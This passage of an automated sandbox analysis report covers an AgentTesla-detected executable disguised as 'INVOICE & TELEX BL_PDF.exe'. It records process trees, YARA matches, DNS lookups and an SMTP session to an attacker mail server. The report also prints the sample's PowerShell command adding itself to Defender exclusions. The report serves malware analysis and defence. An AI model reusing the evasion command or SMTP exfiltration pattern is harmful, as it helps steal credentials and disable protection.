                                                                                          Sep 27, 2021 17:21:14.053952932 CEST49826587192.168.2.3208.91.199.225
                                                                                          Sep 27, 2021 17:21:14.197202921 CEST58749826208.91.199.225192.168.2.3
                                                                                          Sep 27, 2021 17:21:14.197478056 CEST49826587192.168.2.3208.91.199.225
                                                                                          Sep 27, 2021 17:21:14.348969936 CEST58749826208.91.199.225192.168.2.3
                                                                                          Sep 27, 2021 17:21:14.349227905 CEST49826587192.168.2.3208.91.199.225
                                                                                          Sep 27, 2021 17:21:14.490576982 CEST58749826208.91.199.225192.168.2.3
                                                                                          Sep 27, 2021 17:21:14.492063999 CEST49826587192.168.2.3208.91.199.225
                                                                                          Sep 27, 2021 17:21:14.492296934 CEST49826587192.168.2.3208.91.199.225
                                                                                          Sep 27, 2021 17:21:14.493331909 CEST49826587192.168.2.3208.91.199.225
                                                                                          Sep 27, 2021 17:21:14.493479967 CEST49826587192.168.2.3208.91.199.225
                                                                                          Sep 27, 2021 17:21:14.633482933 CEST58749826208.91.199.225192.168.2.3
                                                                                          Sep 27, 2021 17:21:14.634147882 CEST58749826208.91.199.225192.168.2.3
                                                                                          Sep 27, 2021 17:21:14.735589027 CEST58749826208.91.199.225192.168.2.3
                                                                                          Sep 27, 2021 17:21:14.788804054 CEST49826587192.168.2.3208.91.199.225

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Sep 27, 2021 17:19:39.082421064 CEST4957253192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:19:39.098180056 CEST53495728.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:20:01.070050955 CEST6082353192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:20:01.147658110 CEST53608238.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:20:01.766973019 CEST5213053192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:20:01.837229013 CEST53521308.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:20:02.261959076 CEST5510253192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:20:02.288666964 CEST53551028.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:20:02.368654966 CEST5623653192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:20:02.442060947 CEST53562368.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:20:02.896230936 CEST5652753192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:20:02.910125017 CEST53565278.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:20:03.391931057 CEST4955953192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:20:03.405843019 CEST53495598.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:20:03.825503111 CEST5265053192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:20:03.839056969 CEST53526508.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:20:04.583146095 CEST6329753192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:20:04.669064999 CEST53632978.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:20:05.300004005 CEST5836153192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:20:05.320265055 CEST53583618.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:20:05.368905067 CEST5361553192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:20:05.383698940 CEST53536158.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:20:06.204792023 CEST5072853192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:20:06.218301058 CEST53507288.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:20:06.359648943 CEST5377753192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:20:06.373660088 CEST53537778.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:20:06.632663965 CEST5710653192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:20:06.645981073 CEST53571068.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:20:06.889223099 CEST6035253192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:20:06.919882059 CEST53603528.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:20:10.101505995 CEST5677353192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:20:10.114983082 CEST53567738.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:20:12.115597963 CEST6098253192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:20:12.129856110 CEST53609828.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:20:17.413238049 CEST5805853192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:20:17.426877022 CEST53580588.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:20:26.217509985 CEST6436753192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:20:26.244951010 CEST53643678.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:20:35.353610039 CEST5153953192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:20:35.366271019 CEST53515398.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:20:42.631932974 CEST5539353192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:20:42.645131111 CEST53553938.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:20:43.374377012 CEST5058553192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:20:43.387963057 CEST53505858.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:20:53.888812065 CEST6345653192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:20:53.918840885 CEST53634568.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:21:09.864306927 CEST5854053192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:21:09.866015911 CEST5510853192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:21:09.898349047 CEST53551088.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:21:09.899341106 CEST53585408.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:21:12.167356968 CEST5894253192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:21:12.321969032 CEST53589428.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:21:12.817672014 CEST6443253192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:21:12.831943035 CEST53644328.8.8.8192.168.2.3
                                                                                          Sep 27, 2021 17:21:20.407182932 CEST4925053192.168.2.38.8.8.8
                                                                                          Sep 27, 2021 17:21:20.419941902 CEST53492508.8.8.8192.168.2.3

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                          Sep 27, 2021 17:21:12.167356968 CEST192.168.2.38.8.8.80xb247Standard query (0)smtp.zfftcn.comA (IP address)IN (0x0001)
                                                                                          Sep 27, 2021 17:21:12.817672014 CEST192.168.2.38.8.8.80xb6afStandard query (0)smtp.zfftcn.comA (IP address)IN (0x0001)

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                          Sep 27, 2021 17:21:12.321969032 CEST8.8.8.8192.168.2.30xb247No error (0)smtp.zfftcn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                                          Sep 27, 2021 17:21:12.321969032 CEST8.8.8.8192.168.2.30xb247No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                          Sep 27, 2021 17:21:12.321969032 CEST8.8.8.8192.168.2.30xb247No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                          Sep 27, 2021 17:21:12.321969032 CEST8.8.8.8192.168.2.30xb247No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                          Sep 27, 2021 17:21:12.321969032 CEST8.8.8.8192.168.2.30xb247No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                          Sep 27, 2021 17:21:12.831943035 CEST8.8.8.8192.168.2.30xb6afNo error (0)smtp.zfftcn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                                          Sep 27, 2021 17:21:12.831943035 CEST8.8.8.8192.168.2.30xb6afNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                          Sep 27, 2021 17:21:12.831943035 CEST8.8.8.8192.168.2.30xb6afNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                          Sep 27, 2021 17:21:12.831943035 CEST8.8.8.8192.168.2.30xb6afNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                          Sep 27, 2021 17:21:12.831943035 CEST8.8.8.8192.168.2.30xb6afNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)

                                                                                          SMTP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                          Sep 27, 2021 17:21:13.618143082 CEST58749826208.91.199.225192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                          Sep 27, 2021 17:21:13.618455887 CEST49826587192.168.2.3208.91.199.225EHLO 760639
                                                                                          Sep 27, 2021 17:21:13.762732983 CEST58749826208.91.199.225192.168.2.3250-us2.outbound.mailhostbox.com
                                                                                          250-PIPELINING
                                                                                          250-SIZE 41648128
                                                                                          250-VRFY
                                                                                          250-ETRN
                                                                                          250-STARTTLS
                                                                                          250-AUTH PLAIN LOGIN
                                                                                          250-AUTH=PLAIN LOGIN
                                                                                          250-ENHANCEDSTATUSCODES
                                                                                          250-8BITMIME
                                                                                          250 DSN
                                                                                          Sep 27, 2021 17:21:13.763956070 CEST49826587192.168.2.3208.91.199.225AUTH login c2xvdDJAemZmdGNuLmNvbQ==
                                                                                          Sep 27, 2021 17:21:13.905458927 CEST58749826208.91.199.225192.168.2.3334 UGFzc3dvcmQ6
                                                                                          Sep 27, 2021 17:21:14.053101063 CEST58749826208.91.199.225192.168.2.3235 2.7.0 Authentication successful
                                                                                          Sep 27, 2021 17:21:14.053952932 CEST49826587192.168.2.3208.91.199.225MAIL FROM:<slot2@zfftcn.com>
                                                                                          Sep 27, 2021 17:21:14.197202921 CEST58749826208.91.199.225192.168.2.3250 2.1.0 Ok
                                                                                          Sep 27, 2021 17:21:14.197478056 CEST49826587192.168.2.3208.91.199.225RCPT TO:<slot2@zfftcn.com>
                                                                                          Sep 27, 2021 17:21:14.348969936 CEST58749826208.91.199.225192.168.2.3250 2.1.5 Ok
                                                                                          Sep 27, 2021 17:21:14.349227905 CEST49826587192.168.2.3208.91.199.225DATA
                                                                                          Sep 27, 2021 17:21:14.490576982 CEST58749826208.91.199.225192.168.2.3354 End data with <CR><LF>.<CR><LF>
                                                                                          Sep 27, 2021 17:21:14.493479967 CEST49826587192.168.2.3208.91.199.225.
                                                                                          Sep 27, 2021 17:21:14.735589027 CEST58749826208.91.199.225192.168.2.3250 2.0.0 Ok: queued as 44053D8E3C

                                                                                          Code Manipulations

                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          Analysis Process: INVOICE & TELEX BL_PDF.exe PID: 6708 Parent PID: 5732

                                                                                          General

                                                                                          Start time:17:19:19
                                                                                          Start date:27/09/2021
                                                                                          Path:C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe'
                                                                                          Imagebase:0x2a0000
                                                                                          File size:882688 bytes
                                                                                          MD5 hash:22A2657BB48E3303F6F0A0FD1FDFE441
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.315990604.00000000035C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.315990604.00000000035C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.314615327.0000000002647000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          Reputation:low

                                                                                          Chronological Activities

                                                                                          Analysis Process: powershell.exe PID: 6256 Parent PID: 6708

                                                                                          General

                                                                                          Start time:17:19:28
                                                                                          Start date:27/09/2021
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe'
                                                                                          Imagebase:0xae0000
                                                                                          File size:430592 bytes
                                                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Reputation:high

                                                                                          Chronological Activities

                                                                                          Analysis Process: conhost.exe PID: 6480 Parent PID: 6256

                                                                                          General

                                                                                          Start time:17:19:29
                                                                                          Start date:27/09/2021
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7f20f0000
                                                                                          File size:625664 bytes
                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Chronological Activities

                                                                                          Analysis Process: INVOICE & TELEX BL_PDF.exe PID: 5028 Parent PID: 6708

                                                                                          General

                                                                                          Start time:17:19:29
                                                                                          Start date:27/09/2021
                                                                                          Path:C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe
                                                                                          Imagebase:0x420000
                                                                                          File size:882688 bytes
                                                                                          MD5 hash:22A2657BB48E3303F6F0A0FD1FDFE441
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low

                                                                                          Chronological Activities

                                                                                          Analysis Process: INVOICE & TELEX BL_PDF.exe PID: 5728 Parent PID: 6708

                                                                                          General

                                                                                          Start time:17:19:31
                                                                                          Start date:27/09/2021
                                                                                          Path:C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe
                                                                                          Imagebase:0xcb0000
                                                                                          File size:882688 bytes
                                                                                          MD5 hash:22A2657BB48E3303F6F0A0FD1FDFE441
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.554063789.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000002.554063789.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          Reputation:low

                                                                                          Chronological Activities

                                                                                          Disassembly

                                                                                          Code Analysis

                                                                                          Reset < >

                                                                                            Analysis Process: INVOICE & TELEX BL_PDF.exe PID: 6708 Parent PID: 5732 INVOICE & TELEX BL_PDF.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 02469410, Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 02469656
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.314387683.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: ccef59dd9dd53b9b7e053b2c9e631bbf87f43406b945b1433b3998402a445b26
                                                                                            • Instruction ID: 5531cc43be65cbf1c42d9eda0aab3e22c6a8d637ec4f3e361acff34483ebff3a
                                                                                            • Opcode Fuzzy Hash: ccef59dd9dd53b9b7e053b2c9e631bbf87f43406b945b1433b3998402a445b26
                                                                                            • Instruction Fuzzy Hash: 457102B0A00B058FDB24DF6AD4447AAB7F5BF88314F00892ED44AD7B50DB75E8498F92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0246DE3C, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0246FE8A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.314387683.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateWindow
                                                                                            • String ID:
                                                                                            • API String ID: 716092398-0
                                                                                            • Opcode ID: 56eb8129d73d27380bd68ce6b43eaefd8b8e4671b6e4413b8cd11ffc71ded3ec
                                                                                            • Instruction ID: 6edaf5a3a998bef0fc77a74745aea32c73f039dca66297e6455d166dcb2497f7
                                                                                            • Opcode Fuzzy Hash: 56eb8129d73d27380bd68ce6b43eaefd8b8e4671b6e4413b8cd11ffc71ded3ec
                                                                                            • Instruction Fuzzy Hash: 1251B0B1D003099FDB14CFA9D884ADEBBB5BF48314F25852AE819AB210D774A885CF91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02463E40, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 02465421
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.314387683.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 7ed4a8d7ee4e7fbe201cd924032efc2f8cd7219d1c393ca6143fe113530e64db
                                                                                            • Instruction ID: c73af146bc7828f6d7b5b3a4ddd49c9adb7d07fc904d46365a16828c203485ec
                                                                                            • Opcode Fuzzy Hash: 7ed4a8d7ee4e7fbe201cd924032efc2f8cd7219d1c393ca6143fe113530e64db
                                                                                            • Instruction Fuzzy Hash: DC41D1B1C00618CBDB24DFA9C8487DEBBB5BF49308F6084AAD409BB251DB756946CF91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0246A134, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0246B8FE,?,?,?,?,?), ref: 0246B9BF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.314387683.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 1cf19b856504c2689aa87d978c608b38123789f3311b0d0d1387896fd59b7d44
                                                                                            • Instruction ID: b64e86152f5faa1a7822f4ab32a742c7428d99dab84e2ccb8ff14206ad4344eb
                                                                                            • Opcode Fuzzy Hash: 1cf19b856504c2689aa87d978c608b38123789f3311b0d0d1387896fd59b7d44
                                                                                            • Instruction Fuzzy Hash: E321E4B5900248EFDB10CF9AD584AEEBBF8EB48324F14845AE915B3310D378A954CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02468780, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,024696D1,00000800,00000000,00000000), ref: 024698E2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.314387683.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 6657b0265dedb0d5648af54258cb0f60739dd64e7c79ad7864b834ca206d6904
                                                                                            • Instruction ID: e8d73147b28487be4b747100ff7f5425600d2796b653dec14ea762aed5605116
                                                                                            • Opcode Fuzzy Hash: 6657b0265dedb0d5648af54258cb0f60739dd64e7c79ad7864b834ca206d6904
                                                                                            • Instruction Fuzzy Hash: A61114B6D00249DFDB10CF9AD488AEEFBF4EB88314F14842AE415A7700C3B4A545CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 024695F0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 02469656
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.314387683.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 81d6889fa501dbe44967cc22b8c7ce07597fb8f5b0678712d2595a95d6ce9aec
                                                                                            • Instruction ID: 1c9cf55b40797246efda0679f7414b15dcfe129835cbe90431288e9330fa4763
                                                                                            • Opcode Fuzzy Hash: 81d6889fa501dbe44967cc22b8c7ce07597fb8f5b0678712d2595a95d6ce9aec
                                                                                            • Instruction Fuzzy Hash: CF11E3B5D007498FDB10DF9AD448BDEFBF4AB49724F14841AD429B7610C378A546CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 0246E5F0, Relevance: .3, Instructions: 315COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.314387683.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5f36ca0170810a7203abc1acde8a9ea00e21ac3af32a8a8e20582e38321a730a
                                                                                            • Instruction ID: 91096022064ce6635c64eb89ee28ba60e6670816b08fbca9081108a22ad54cb0
                                                                                            • Opcode Fuzzy Hash: 5f36ca0170810a7203abc1acde8a9ea00e21ac3af32a8a8e20582e38321a730a
                                                                                            • Instruction Fuzzy Hash: 4712B5F1412746EAD330CF67E89858D3BA1F74532AB90430AD2615BAD0D7BC194BEFA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0246C194, Relevance: .3, Instructions: 265COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.314387683.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e47a5f83c746b0e527a36f58696e1a1efb23a6a83cd2aa0e8f78b4805ef5c660
                                                                                            • Instruction ID: 1cde909567a42abf72fad4020315ab1c0f8817f7c6f25b2dd0f491cf9c40efa0
                                                                                            • Opcode Fuzzy Hash: e47a5f83c746b0e527a36f58696e1a1efb23a6a83cd2aa0e8f78b4805ef5c660
                                                                                            • Instruction Fuzzy Hash: 03A17D32E00219CFCF15DFB5C8885AEB7B2FF88700B15856BE805AB265EB35A945CF50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0246E5E0, Relevance: .2, Instructions: 223COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.314387683.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0312b86765e0088d2b66eef585e8e845253308cfdcf5d81d9c1d6dce547e1977
                                                                                            • Instruction ID: 2242a6663a19f1c51f6255f039c44b92d0c4035f0117120484e66a5e7c6a05df
                                                                                            • Opcode Fuzzy Hash: 0312b86765e0088d2b66eef585e8e845253308cfdcf5d81d9c1d6dce547e1977
                                                                                            • Instruction Fuzzy Hash: 05C12BF1812746EAD320DF66E89818D3BB1FB8532AF51430AD2616B6D0D7BC184BDF64
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Analysis Process: INVOICE & TELEX BL_PDF.exe PID: 5728 Parent PID: 6708 INVOICE & TELEX BL_PDF.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 01470D60, Relevance: 8.2, APIs: 2, Strings: 2, Instructions: 1168COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.555845708.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: D0jm$\em
                                                                                            • API String ID: 0-2925712236
                                                                                            • Opcode ID: 01612626f5c94baf1e60afbdf56118e832045d36f30651f97aef638758b4d667
                                                                                            • Instruction ID: 2c2958a3c2f5cda1778ef4a4ee33319121fa27721bc1d2e80e70146f482addb9
                                                                                            • Opcode Fuzzy Hash: 01612626f5c94baf1e60afbdf56118e832045d36f30651f97aef638758b4d667
                                                                                            • Instruction Fuzzy Hash: 5C92E070B002458FDB25DBB8C8947EEBBB6AF85710F14892AE109EF3A5DB74DC418791
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0150D9DA, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 631COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetWindowLongPtrA.USER32(00000001,00000000,00000000,00000000,?,00000000), ref: 0150DC67
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.555999443.0000000001500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LongWindow
                                                                                            • String ID: 8^jm
                                                                                            • API String ID: 1378638983-3739783712
                                                                                            • Opcode ID: 1688e2e0dc8d62d28c1af62531003d3ab14901b2ffdae7ef1cf4f73d75ac1891
                                                                                            • Instruction ID: d69c45b0937e1be7540809fea9104aaafe2fb95e9e252a73f5e8568f3e309101
                                                                                            • Opcode Fuzzy Hash: 1688e2e0dc8d62d28c1af62531003d3ab14901b2ffdae7ef1cf4f73d75ac1891
                                                                                            • Instruction Fuzzy Hash: 0832A430A002498FEB65DBE8C9547ADBBB2FF85304F24C569D409AF286DB749C85CB52
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0127B908, Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.554865016.0000000001270000.00000040.00000001.sdmp, Offset: 01270000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c9bd6901fcd9536daacce0aa96176b980896aa93a560e1b3b343ae9928cdb543
                                                                                            • Instruction ID: 54cde8b9d9a235b3562e667f93b9ca0beb05d41188b8a92d500c3f244e294e86
                                                                                            • Opcode Fuzzy Hash: c9bd6901fcd9536daacce0aa96176b980896aa93a560e1b3b343ae9928cdb543
                                                                                            • Instruction Fuzzy Hash: 52F18E30A1020ACFDB14DFA9C884BAEBBF1FF88314F548568E505AF365DB70A945CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01476AC0, Relevance: 1.7, APIs: 1, Instructions: 180libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.555845708.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 33c1ef25cf11dbcacce06a6c4115284550e916f20d66ecfcd186c5d03ba0d81b
                                                                                            • Instruction ID: ba5f5405dc28a968a926e914badd1b862b3580b43b35094a51e1cc308df1225a
                                                                                            • Opcode Fuzzy Hash: 33c1ef25cf11dbcacce06a6c4115284550e916f20d66ecfcd186c5d03ba0d81b
